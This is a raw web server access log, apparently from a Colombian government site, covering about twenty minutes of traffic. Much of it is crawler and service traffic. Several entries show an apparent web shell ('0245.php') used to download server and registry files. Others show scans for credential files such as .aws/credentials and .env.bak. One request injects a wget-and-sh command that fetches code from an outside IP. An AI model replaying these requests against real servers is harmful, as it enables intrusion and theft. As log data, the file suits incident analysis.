186.102.6.16 - - [24/Jun/2024:06:20:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/iNwTLi4vpxyYZuZsroXih1KvaFTMufcDmXks2OLNshNg5kaLed4byhNTLtWFWvWH2jFqjMx6iBS0jeZn9UzPxNOFHRK1sljHDMXg1g1L7HE+UCI28qlEWCsZcgkRFYJY4WWP5wGeVD8uHisghgNpVf2CICcrsRaixTR8n9McipCjuDHco1RG6A6B9KEHoXTfM8UXxEny7Kw==&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 26
181.59.244.61 - - [24/Jun/2024:06:20:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2145060
181.52.223.52 - - [24/Jun/2024:06:19:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1648147
181.52.223.52 - - [24/Jun/2024:06:19:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2311171
201.245.192.253 - - [24/Jun/2024:06:20:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [24/Jun/2024:06:21:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
45.156.85.212 - - [24/Jun/2024:06:21:39 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
45.156.85.212 - - [24/Jun/2024:06:21:40 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Jun/2024:06:22:06 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:06:22:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.176 - - [24/Jun/2024:06:23:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Footer.class.php&ft=download HTTP/1.1" 200 9849
201.245.192.253 - - [24/Jun/2024:06:23:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.210 - - [24/Jun/2024:06:23:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=String.class.php&ft=download HTTP/1.1" 200 6866
172.22.2.4 - - [24/Jun/2024:06:22:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.119.6.7 - - [24/Jun/2024:06:24:17 -0500] "GET /bla/resoluciones/autos%202015/1052.pdf HTTP/1.1" 200 2210866
186.119.6.7 - - [24/Jun/2024:06:24:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
47.128.96.104 - - [24/Jun/2024:06:24:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=server_engines.lib.php&ft=download&white=1 HTTP/1.1" 200 4354
201.245.192.253 - - [24/Jun/2024:06:24:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [24/Jun/2024:06:23:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.117.155 - - [24/Jun/2024:06:24:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Crte%5C&f=rte_events.lib.php&ft=download HTTP/1.1" 200 25606
66.249.66.21 - - [24/Jun/2024:06:25:15 -0500] "GET /Publicaciones/2024EE81764.pdf HTTP/1.1" 404 227
201.245.192.253 - - [24/Jun/2024:06:25:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.89 - - [24/Jun/2024:06:25:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=transformations.lib.php&ft=download HTTP/1.1" 200 13523
201.245.192.253 - - [24/Jun/2024:06:25:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.19.18 - - [24/Jun/2024:06:25:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&f=00386.pdf&ft=download&white=1 HTTP/1.1" 200 454310
201.245.192.253 - - [24/Jun/2024:06:26:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.52 - - [24/Jun/2024:06:26:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/2596.pdf HTTP/1.1" 200 329977
47.128.19.183 - - [24/Jun/2024:06:26:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=List_Database.class.php&ft=download HTTP/1.1" 200 4574
199.16.157.182 - - [24/Jun/2024:06:26:57 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
47.128.61.177 - - [24/Jun/2024:06:27:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Util.class.php&ft=download HTTP/1.1" 200 157432
216.245.221.92 - - [24/Jun/2024:06:27:06 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:06:27:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.19.131 - - [24/Jun/2024:06:27:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringNative.class.php&ft=download HTTP/1.1" 200 2077
201.245.192.253 - - [24/Jun/2024:06:27:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36549
201.245.192.253 - - [24/Jun/2024:06:27:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37044
172.22.2.4 - - [24/Jun/2024:06:27:38 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
47.128.19.191 - - [24/Jun/2024:06:28:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Response.class.php&ft=download HTTP/1.1" 200 10025
176.126.103.79 - - [24/Jun/2024:06:28:16 -0500] "GET /_profiler/phpinfo HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:16 -0500] "GET /phpinfo.php HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:17 -0500] "GET /phpinfo HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:17 -0500] "GET /aws.yml HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:18 -0500] "GET /.env.bak HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:18 -0500] "GET /info.php HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:19 -0500] "GET /.aws/credentials HTTP/1.1" 404 1018
176.126.103.79 - - [24/Jun/2024:06:28:20 -0500] "GET /config/aws.yml HTTP/1.1" 404 1018
201.245.192.253 - - [24/Jun/2024:06:28:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
176.126.103.79 - - [24/Jun/2024:06:28:20 -0500] "GET / HTTP/1.1" 200 319
176.126.103.79 - - [24/Jun/2024:06:28:21 -0500] "GET /config.js HTTP/1.1" 404 1018
3.212.128.62 - - [24/Jun/2024:06:28:22 -0500] "HEAD / HTTP/1.1" 200 -
47.128.45.42 - - [24/Jun/2024:06:28:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000210.tif&ft=download&white=1 HTTP/1.1" 200 40050
66.249.66.21 - - [24/Jun/2024:06:28:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/2981.pdf HTTP/1.1" 200 386973
66.249.66.20 - - [24/Jun/2024:06:28:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/3997.pdf HTTP/1.1" 200 354990
66.249.66.19 - - [24/Jun/2024:06:28:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/3455.pdf HTTP/1.1" 200 385706
66.249.66.20 - - [24/Jun/2024:06:28:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/0527.pdf HTTP/1.1" 200 308661
66.249.66.19 - - [24/Jun/2024:06:28:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/3825.pdf HTTP/1.1" 200 358522
66.249.66.19 - - [24/Jun/2024:06:28:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/2367.pdf HTTP/1.1" 200 400467
66.249.66.19 - - [24/Jun/2024:06:28:56 -0500] "GET /BLA/resoluciones/AUTOS%202020/2383.pdf HTTP/1.1" 200 322257
66.249.66.19 - - [24/Jun/2024:06:29:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/3795.pdf HTTP/1.1" 200 351979
66.249.66.20 - - [24/Jun/2024:06:29:08 -0500] "GET /BLA/resoluciones/AUTOS%202020/4604.pdf HTTP/1.1" 200 350509
66.249.66.19 - - [24/Jun/2024:06:29:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/0754.pdf HTTP/1.1" 200 366520
47.128.45.45 - - [24/Jun/2024:06:29:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5C&f=NTUSER.DAT%7B016888bd-6c6f-11de-8d1d-001e0bcde3ec%7D.TMContainer00000000000000000001.regtrans-ms&ft=download&white=1 HTTP/1.1" 200 245331
66.249.66.21 - - [24/Jun/2024:06:29:20 -0500] "GET /BLA/resoluciones/AUTOS%202020/2341.pdf HTTP/1.1" 200 338909
201.245.192.253 - - [24/Jun/2024:06:29:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [24/Jun/2024:06:29:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/3612.pdf HTTP/1.1" 200 430258
66.249.66.19 - - [24/Jun/2024:06:29:32 -0500] "GET /BLA/resoluciones/AUTOS%202020/1057.pdf HTTP/1.1" 200 361040
66.249.66.19 - - [24/Jun/2024:06:29:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/3814.pdf HTTP/1.1" 200 334338
201.245.192.253 - - [24/Jun/2024:06:29:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37032
47.128.48.158 - - [24/Jun/2024:06:29:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringMB.class.php&ft=download&white=1 HTTP/1.1" 200 2318
66.249.66.19 - - [24/Jun/2024:06:29:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/4669.pdf HTTP/1.1" 200 388411
172.22.2.4 - - [24/Jun/2024:06:28:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [24/Jun/2024:06:29:49 -0500] "GET /BLA/resoluciones/AUTOS%202020/0106.pdf HTTP/1.1" 200 612602
66.249.66.20 - - [24/Jun/2024:06:29:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/1556.pdf HTTP/1.1" 200 1506721
66.249.66.20 - - [24/Jun/2024:06:30:01 -0500] "GET /BLA/resoluciones/AUTOS%202020/1223.pdf HTTP/1.1" 200 1051525
201.245.192.253 - - [24/Jun/2024:06:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37044
66.249.66.20 - - [24/Jun/2024:06:30:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/3002.pdf HTTP/1.1" 200 299767
47.128.45.76 - - [24/Jun/2024:06:30:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cplugins%5C&f=AuthenticationPlugin.class.php&ft=download&white=1 HTTP/1.1" 200 1040
201.245.192.253 - - [24/Jun/2024:06:30:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [24/Jun/2024:06:30:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [24/Jun/2024:06:29:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [24/Jun/2024:06:28:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47256
47.128.53.227 - - [24/Jun/2024:06:30:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csuelos%5Cimages&f=sort_both.png&ft=download HTTP/1.1" 200 1136
201.245.192.253 - - [24/Jun/2024:06:31:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.56.126 - - [24/Jun/2024:06:31:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Crte%5C&f=rte_triggers.lib.php&ft=download&white=1 HTTP/1.1" 200 18107
185.191.127.212 - - [24/Jun/2024:06:31:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
47.128.47.198 - - [24/Jun/2024:06:31:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000240.tif&ft=download&white=1 HTTP/1.1" 200 20131
216.245.221.92 - - [24/Jun/2024:06:32:06 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:06:32:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.95 - - [24/Jun/2024:06:32:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Util.class.php&ft=download&white=1 HTTP/1.1" 200 157432
47.128.47.219 - - [24/Jun/2024:06:32:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cmod_evasive%5C&f=CHANGELOG&ft=download&white=1 HTTP/1.1" 200 1373
201.245.192.253 - - [24/Jun/2024:06:33:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.157 - - [24/Jun/2024:06:33:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=tbl_gis_visualization.lib.php&ft=download&white=1 HTTP/1.1" 200 9650
201.245.192.253 - - [24/Jun/2024:06:34:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.153 - - [24/Jun/2024:06:34:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz%5C&f=filezilla_setup.bat&ft=download&white=1 HTTP/1.1" 200 78
66.249.66.19 - - [24/Jun/2024:06:35:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/4689.pdf HTTP/1.1" 200 387325
201.245.192.253 - - [24/Jun/2024:06:35:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.239 - - [24/Jun/2024:06:35:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=index.lib.php&ft=download HTTP/1.1" 200 1284
201.245.192.253 - - [24/Jun/2024:06:35:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [24/Jun/2024:06:33:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.25.144 - - [24/Jun/2024:06:35:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=check_user_privileges.lib.php&ft=download HTTP/1.1" 200 6559
201.245.192.253 - - [24/Jun/2024:06:36:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [24/Jun/2024:06:34:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
47.128.33.13 - - [24/Jun/2024:06:36:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000218.tif&ft=download&white=1 HTTP/1.1" 200 109392
172.22.2.4 - - [24/Jun/2024:06:37:00 -0500] "GET /BLA/boletinlegal/version HTTP/1.1" 404 1018
47.128.40.9 - - [24/Jun/2024:06:37:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=Response.class.php&ft=download&white=1 HTTP/1.1" 200 10025
216.245.221.92 - - [24/Jun/2024:06:37:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:06:37:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [24/Jun/2024:06:37:27 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
47.128.37.210 - - [24/Jun/2024:06:37:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cconfig%5C&f=user_preferences.forms.php&ft=download&white=1 HTTP/1.1" 200 8782
201.245.192.253 - - [24/Jun/2024:06:37:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36549
201.245.192.253 - - [24/Jun/2024:06:37:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37044
47.128.27.162 - - [24/Jun/2024:06:38:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=zip.lib.php&ft=download HTTP/1.1" 200 6936
201.245.192.253 - - [24/Jun/2024:06:38:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.63.96 - - [24/Jun/2024:06:38:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=error.inc.php&ft=download HTTP/1.1" 200 1234
186.144.236.44 - - [24/Jun/2024:06:39:04 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/6IV+qvne21d8+n823tSgHg0skgWyu0BathPTNEuKKJx4amOjqEJBW&y=U2FsdGVkX1/0DPWpsr69UN/dJyd/eXj5B/9USxC/yi26rim2Rkr1pZTi5h6o9qxD HTTP/1.1" 200 30
186.144.236.44 - - [24/Jun/2024:06:39:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18qWM29Zu/dVPV1WwilIksXg0mF8bDjsllfvRogzul7RZ4GG8bCXEoAGLVXNrXfl25+EZZiLyRguy3Wt46FoG4u+DYsb3UdhYQ=&u=U2FsdGVkX19TK3UHEJRRbZLIiyNEXAOYWPjpzuP/cWQ=&y=U2FsdGVkX1/0DPWpsr69UN/dJyd/eXj5B/9USxC/yi26rim2Rkr1pZTi5h6o9qxD HTTP/1.1" 200 97
186.144.236.44 - - [24/Jun/2024:06:39:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18H+DKTjkeK/kNAKJtvqWva0QBYEdocyoXwDUYgwmpv6ZpwEgJzE8GCw4JDZHcbsjZRy/qUCNyMkSlMLHk6ZqvvnHxk+awFB6TTMUBY4QFRxHsY4UGPP/NudWGTrKRwAOCw0w2h/ebYkjZrKP/iDba4rxGpg/4U/vcIiBg3hQxOkL0dAzNEQwuBxhpBBpZsUlXXJJTi3QmluDWlrd+k2XX2MCUnSFvngArhQAs+Rs7ucpLVdTnK9Sut6l52oJi1BVkEiTPpSPojZMsWBQrYGbBidOiu01NkXw6K0WBgG7MQOl2YTg8vaMVKCRWxIY9ygvUgCRNaHduSeXc5fpYvxfHXJxUJ6yjeLciSnzlGw2848Mx3LvthvZc3B+cXC0uMBnnoNC9Va107bwMH1n2V0G85GBzHvNuER2M9AXhimmC+SedlvHaR1ZNj2pAmDwhbK+fwes5or/xY54UqQ0x97JrWEqGHwxO5NgZs96x1oQ2YOzJchppk+EHvQFRNNSE9+ip39xiKHT3OknVhYS4HO8fbzcUSe2ty0HLRrj4FdmcwYdsXK735lusD9Rs1GusrA9dZXxzbpKwiQe9rslU7P2qIgJ0Rzh1aeuqLvZ9sckbzvFb2CqTrpW3UfNFnoRfyvyVt8O6ezLhRo+3g5MobvtBY837QdKZvRz8BQk4Oj/yeFMcQLtbyF7lKIN7olsI+mIQK8Ayxh8Y7XN1PyDl21Sxd/EMNHlRgUSYlZKxrD2nvQdvYPJX7kdp89MqkGjiJ7Db35Z3q57auwefByL76Tg3XQS/B2ecQ9mnIbn2lbGGK0KXuVHh69Pp5FdhZ1kl4eNB6Z2OuaBcQG5ALUYXvRmr+wbb507UCQQDk3ui4O4Bgif+SImB1YROlsfzvU+CgiAHmPFdnulO+9HHYhVzHOEG2EC42AvH2hgDv9k4pHm2nayN0SvxBnPFK/rDBAgsmRTDVrlQs8yV6lpYHfJAnLzwhAwdY9l556r0rWHin2Ye3yn2RQfEXn6xw6Dz8bKdpFICDdH9WMCIadbi1HB+PLzXU+7Kf2f7Un8sSguqGZFUja8aw9SAp3pA5o3yFq5a59OknJjsBL+Lg/GV5eh37M35+CgNKk1O1Pw2muEkWSs/and+G0yk6/Kc/ycdtmiZklqjKoRmXkHb0mNs7ZKuOi2PQqhgC/qjGGKDHNlDSI4ewbLJF+gRGkhZBPOp5MHA4dAhrrZLo5/III6vqp+4Ni+1wOjjO9Z+ea5C+Rzfof2BX5U+45BVk0S4Qzci8Unv/almJoCfOBmfmszadeHSwkP57H3e2RIjf2DR0BZ76fqfLFOuQB1UaI1PmAhB5gJxDgGYDplS8V9TZhbCQlYAThHNSyk9wvLDQfk32wFszxEYl9umG9ae+wDrFG/sEpsp8QJKp95NkSb54tzQwe1ZqPXjYqYkoUWAaUA9FSBH5Sq18kYdhXzOT3uBa6rjHFVN2ahEvUPRE4zOTOwFKrtRgEJPWRdEaQT/7eml9VNCKkv5GyozeGl/MAsa4d2z848lBVpCItSsp/ukNotXTZr50qTJeDFOhbqrSjmtrZwipDjJjsFwEndlmneNkjm8UYXR8nu/1qxW0gvSIRWNg5BijI/H0pLoOsKKhdCASwj/zGUQHyUpBXXbxRb4i80xI8gaC6RWpdvVAuLwvlcVYOrXUigoDJ/9zISF667tW9SUFeJ6fYUp5ScfJcVUWDPtLdars+mgJWqoDCiYLcbf2DNpM2LUpRDu69BOj2p0=&u=U2FsdGVkX19TK3UHEJRRbZLIiyNEXAOYWPjpzuP/cWQ=&y=U2FsdGVkX1/0DPWpsr69UN/dJyd/eXj5B/9USxC/yi26rim2Rkr1pZTi5h6o9qxD HTTP/1.1" 200 351
186.144.236.44 - - [24/Jun/2024:06:39:04 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX185ByvIlVDs4T0u8H6gmMgPmqLUZ1F9fkoOhGElE9BItie6AdcU9StQId8DsmcHOVdZtkjKRS5MML0Y662Mvqc6AqrFOhC1mH2MhTO6h8LPWUugFp7OC7Wwt7kZlPD8PtJ3khASqPmFF9ghZVqUnPI5oTyf0Zv+VYy5ZRBy+uEpQqSPbLWMtVNKt3kJA9H5iJDrtyJICbOSNLwny/GC8OQxNaAiuYDSR6COyqU8uMYIfNkjzC/+7F2XGOkSZyMkMT3uWxGtrwHjaMibJmpeEB5rpv3nnwv9t4yvr5+mvwv5KbMN/3Vyd9fns9wpynQcO9wCQUuvK9GXkNDpQAtAW4hljaU/8Vc67WuF7TuCdgPe4qY6HmmzewUGeRd72Gc6OO0EHhZdMMVbhT3dn4dejcQtaAkV/ABTpy53HDJOrjAMbeNuzBUPNYXrMyPGN7hM+rBbUCimJLnfhnWTyssXouJN8QwbLdTT+ZdedfT3JoxjLuV3iysKzlta5keOa6jawQ+qg6ogK0B0klYB/f371cn7s9oIHl7Cpx/n/HR4C/3LeQZg+HzADDawgoxnIrX7ugOqJVjdJnqg6lGFxq8ZHqZZNKgJHJXpZ2Ezh3uDznU5ebfDmHdNXmdN64EXFqoZRkA7LcXvpUoozbD4tOA82nMUdT/Yh0seNeJCTdpUwZD1Sj/9ukduZyNOCOTasH87zm3LaG+B0F5HIAJNEWFKc1gkV2dyX6crw2F0A/vKE2HPqE2rlxmBLjiK&u=U2FsdGVkX19TK3UHEJRRbZLIiyNEXAOYWPjpzuP/cWQ=&y=U2FsdGVkX1/0DPWpsr69UN/dJyd/eXj5B/9USxC/yi26rim2Rkr1pZTi5h6o9qxD HTTP/1.1" 200 208
186.144.236.44 - - [24/Jun/2024:06:39:04 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/6IV+qvne21d8+n823tSgHg0skgWyu0BathPTNEuKKJx4amOjqEJBW HTTP/1.1" 200 30244
47.128.48.99 - - [24/Jun/2024:06:39:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=RESOLUCION+2076+DE+2000.pdf&ft=download&white=1 HTTP/1.1" 200 49913
172.22.2.4 - - [24/Jun/2024:06:38:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [24/Jun/2024:06:39:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [24/Jun/2024:06:39:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37032
47.128.27.127 - - [24/Jun/2024:06:39:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringCType.class.php&ft=download HTTP/1.1" 200 2828
201.245.192.253 - - [24/Jun/2024:06:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37044
40.77.167.55 - - [24/Jun/2024:06:40:11 -0500] "GET /BLA/resoluciones/AUTOS%202018/6717.pdf HTTP/1.1" 200 238909
47.128.99.112 - - [24/Jun/2024:06:40:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=SavedSearches.class.php&ft=download HTTP/1.1" 200 11586
201.245.192.253 - - [24/Jun/2024:06:40:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [24/Jun/2024:06:40:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.21.25 - - [24/Jun/2024:06:40:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=core.lib.php&ft=download&white=1 HTTP/1.1" 200 24934
40.77.167.55 - - [24/Jun/2024:06:41:00 -0500] "GET /Publicaciones/2024EE116217.pdf HTTP/1.1" 404 228
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [24/Jun/2024:06:41:05 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
